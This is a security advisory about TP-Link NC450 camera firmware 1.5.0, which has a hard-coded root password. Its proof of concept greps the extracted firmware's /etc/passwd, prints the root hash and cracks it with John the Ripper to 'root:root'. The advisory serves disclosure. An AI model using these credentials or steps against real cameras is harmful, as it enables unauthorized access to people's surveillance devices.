NC450 1.5.0 Build 181022 Rel.3A033D Hardcoded Credentials

2019.04.08
Credit: Sachin Wagh
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

*Summary:* The NC450 is your favorable companion that meets to home and office surveillance needs, keeping you in touch with what matters most. With its smooth and durable Pan/Tilt of up to 300/110 degrees, you can turn the camera to almost any position you want and watch over a wider area of your home. HD Pan/Tilt Wi-Fi Camera NC450 contain hard-coded credentials within its Linux distribution image. This credentials (root:root) cannot be changed through any normal operation of the camera. *Vendor:* TP-LINK Technologies Co., Ltd. - http://www.tp-link.us *Affected Version:* NC450 1.5.0 Build 181022 Rel.3A033D *Vendor Status* N/A *Proof Of Concept:* /home/oit/Desktop/Firmware/_NC450_1.5.0_Build_181022_Rel.3A033D.bin.extracted/jffs2-root [oit@ubuntu] [10:34] > grep -iRn "root:" . Binary file ./fs_1/bin/pppd matches ./fs_1/etc/passwd:1:root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:/bin/sh ./fs_1/etc/group:1:root:x:0: root@kali:~# cat hash.me root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:/bin/sh root@kali:~# john hash.me --show root:root:0:0:Linux User,,,:/home/root:/bin/sh 1 password hash cracked, 0 left *Credit:* Sachin Wagh (@tiger_tigerboy) *Reference:* https://www.tp-link.com/in/home-networking/cloud-camera/nc450/ https://www.tp-link.com/in/support/download/nc450/#Firmware Best Regards, *Sachin Wagh* Security Researcher


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top